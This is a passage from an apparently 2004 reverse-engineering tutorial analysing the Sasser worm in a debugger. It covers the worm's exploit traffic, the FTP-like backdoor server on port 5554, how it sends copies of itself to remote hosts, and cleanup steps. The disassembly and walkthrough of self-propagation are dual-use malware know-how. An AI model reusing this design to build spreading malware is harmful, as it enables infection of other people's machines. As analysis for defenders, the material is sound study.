| 0012FE0C | 69 | 00 | 70 | 00 | 63 | 00 | 24 | 00 | 00 | 00 | 3F | 3F | 3F | 3F | 3F | 00 | i.p.c.\$?????.     |

Note that the target IP is present there, there are also some script-like characters like "ipc\$". More data to be sent... we don't cut and paste the next here due to lack of interest. After more string manipulation the virus sends a big 10FC bytes length string to the target host. Finally, another call to send more data and the virus closes this socket. This completes this part of this article, which - as we mentioned - you yourself can extend by examining how the exploit works (connect to your own port).

#### The server

Our virus, is also able to act as a elementary FTP server, it receives commands on port 5554 (ports open by trojans and viruses frequently have numbers more or less as big as this one, the lower ones are reserved by the system) and responds accordingly. The server part is done at the thread we omitted above, let's see how it works.

After creating the mutex we are again at the thread creation, the first thread will start a server in the local host (the second has already been studied).

We set an infinite loop after the call to kernel32.CreateThread, a bpx at the entry point of the thread and create it:

```
004020A9 call edi
004020AB mov ebx,80 ; your infinite loop should go here (jmp 004020AB)
```

Now, you are at the entry point of the new thread:

| 00401E65 | push ebp    |
|----------|-------------|
| 00401E66 | mov ebp,esp |
| 00401E68 | sub esp,14  |

This thread starts by creating a new socket, with the same parameteres we used above in the other thread, then it converts to the right format the pre-stored port number, which results into 5554.

```
00401E72 push 2

00401E74 call dword ptr [<&WS2_32.#23>] ; WS2_32.socket

...

00401E8E mov word ptr [ebp-14],2

00401E94 call dword ptr [<&WS2_32.#9>] ; WS2_32.ntohs
```

When you want to install a server in your machine you need to open one of your ports and to allow incoming connections. This, essencially, consists of the following steps:

- Create a socket.
- Bind your socket to a local port.
- Prepare your socket to receive messages (for example, FTP commands).

The second and third steps come next:

```
00401EA5
            mov dword ptr [ebp-10],esi
            call dword ptr [<&WS2 32.#2>] ; WS2 32.bind, bind to port 5554
00401EA8
                                             ; (the port which will listen)
. . .
            push 5
00401EB3
00401EB5
            push edi
            call dword ptr [<&WS2 32.#13>] ; WS2 32.listen,
00401EB6
                                             ; this prepares the socket
                                             ; to "listen" to incoming commands
. . .
00401ECC
            push edi
            call dword ptr [<&WS2 32.#1>]
                                             ; WS2 32.accept, await for an incoming
00401ECD
                                             ; message
```

At this point, since we don't know what the virus does and we don't want to connect to the Internet due to the risk it involves, we have the following options:

- Code ourselves a client for this server.
- Omit the call to WS2\_32.connect and see what does the virus when it receives a message.
- Open a telnet session and connect ourselves to the given port.

Yes, we choose the third one (in other articles we will choose the first, the second is only good for very simple viruses). So, you have to go to the command line and type "telnet 127.0.0.1 5554". This will establish connection and you will see that the debugger is called again, WS2\_2.accept has returned.

Btw: do "netstat -na" on the command line and you will see all our open ports, in particular the one the virus has opened. Note that, since you are not connected to the internet, the local IP will be displayed as "0.0.0.0". However, you must connect to 127.0.0.1 (which is the so called loopback).

Copyright © 2004 and published by the CodeBreakers-Journal. Single print or electronic copies for personal use only are permitted. Reproduction and distribution without permission is prohibited.

When WS2\_32.accept returns the virus creates a new thread, this thread will respond to our commands. Let's create it and see what happens:

00401B08 push ebp ; start of the thread that will ; reply our telnet connection 00401B09 mov ebp,esp 00401B0B sub esp,8E4

First, the virus sends us a typical "ok" reply, to be exact it sends "220 OK" (ending in a line feed, all data you send in internet protocols ends with it):

00401B3C call esi ; WS2\_32.send

Run it, and you will see the message on your telnet session. Now, the virus expects to receive some data. Type "USER yourname" and press intro, this will send this data to the virus (normally, you have to send the user and then the password, in this order). Go to the virus and run the call to WS2\_32.recv, you will see that it has received your username, check the buffer. Then, the virus sends us its acknowledgment, "331 OK" (again, go to the telnet session to see it). Of course, we now have to send the password, something like "PASS yourname" (you will see the string "PASS" after the call to WS2\_32.recv). Again, the procedure to look inside the returned data for a given string is called, it locates "PASS" and proceeds to send us another success code, "230 OK". After having received the username and password you also have this other possible commands: PORT, RETR, QUIT (see the string references, all possible commands are nicely grouped so everybody can easily read them). The command "QUIT" is a bit confusing, the virus will simply reply with a "226 OK". Let's go with the other commands.

The command RETR requests a copy to the virus to a given IP, this IP has to be specified through a PORT directive, for example let's send a "PORT 123". For now, the virus will return - after some string manipulation - a "220 OK". Next, it shall move to await for more input. Let's tell the virus we want to receive a copy of it at the given port, "RETR" will do this job, send it. The virus takes the previously passed IP once formatted and will try to connect there. Note that the routine to generate the IP from the passed one is buggy, it shall always generate - as far as we have seen - an IP of the form XXX.XX.65538.X, which is an invalid one. Changing the destination port doesn't work at all, let's try the command RETR.

First, we send an "PORT 111" and next a RETR, the virus will try to convert the "111.1.65538.0" to the standard format:

004011DC call dword ptr [<&WS2\_32.#11>] ; WS2\_32.inet\_addr

Since the passed IP was invalid, 65538 & 255, the call will return a -1, change this to any other value than 0,1 and continue debugging. The virus checks the return code, it testes that this is neither INADDR\_NONE nor 0. Next, it creates a socket to connect to the given IP:

| 00401D15 | call dword ptr [<&WS2_32.#23>] | ; WS2_32.socket  |
|----------|--------------------------------|------------------|
| • • •    |                                |                  |
| 00401D30 | call dword ptr [<&WS2_32.#4>]  | ; WS2_32.connect |

The call to WS2\_32.connect will obviously fail, change the return to 0. As we mentioned above, the virus is going to send itself through this connection. For this, it needs to have access to its own executable file:

00401D50 push 0 00401D52 call dword ptr [<&KERNEL32.GetModuleFileNameA>]

And now opens itself with READ permissions:

00401D61 call dword ptr [<&KERNEL32.\_lopen>]

Finally, it reads a single byte from itself and sends it to the host we have provided. This operation repeats again and again, until the whole virus has been transferred to the remote host. When this cycle terminates the virus awaits for new instructions.

### V. How to clean it

If you have read so far you don't need to be said that to clean Sasser from your machine you have to:

- Remove avserve2.exe from the registry.
- Remove avserve2.exe from your WINDOWS directory.

Other versions of Sasser need a different treatment.

### **VI.** Conclusions

Sasser is quite a simple virus, programmed in Visual C++ with some elementary features that can be simply ripped from many other viruses. However, it has the virtue of incorporating an exploit which makes it to spread quite quickly. Well patched Operative Systems are essentially safe against this kind of i-Worms but the truth is that most users do not want to loose their time into downloading heavy updates, this makes all Anti-Virus efforts useless.

Let's review some of the main mistakes in the virus:

- Creating 128 threads slows so much the machine that is evident that something strange is going on.
- Sending the virus byte by byte requires lots of unnecessary calls. Again, this slows down the connection.
- Sockets are opened and closed when no need.
- The registry key used by the virus is totally outdated.

It's hard to believe that somebody able to find by himself one of the latest exploits, which are published in a way that are totally impossible to reproduce for the novice, ends up coding such a poor program.

Unfortunately, Sasser is only one more of many viruses which simply incorporate an outdated exploit, they all survive a few days but the economical damage is big enough to gain headlines in the international press. At the time of this writing, another variant of the almost dead worm myDoom has been found in the wild.

### References

[1] OllyDebugger, Available at ollydbg.cbj.net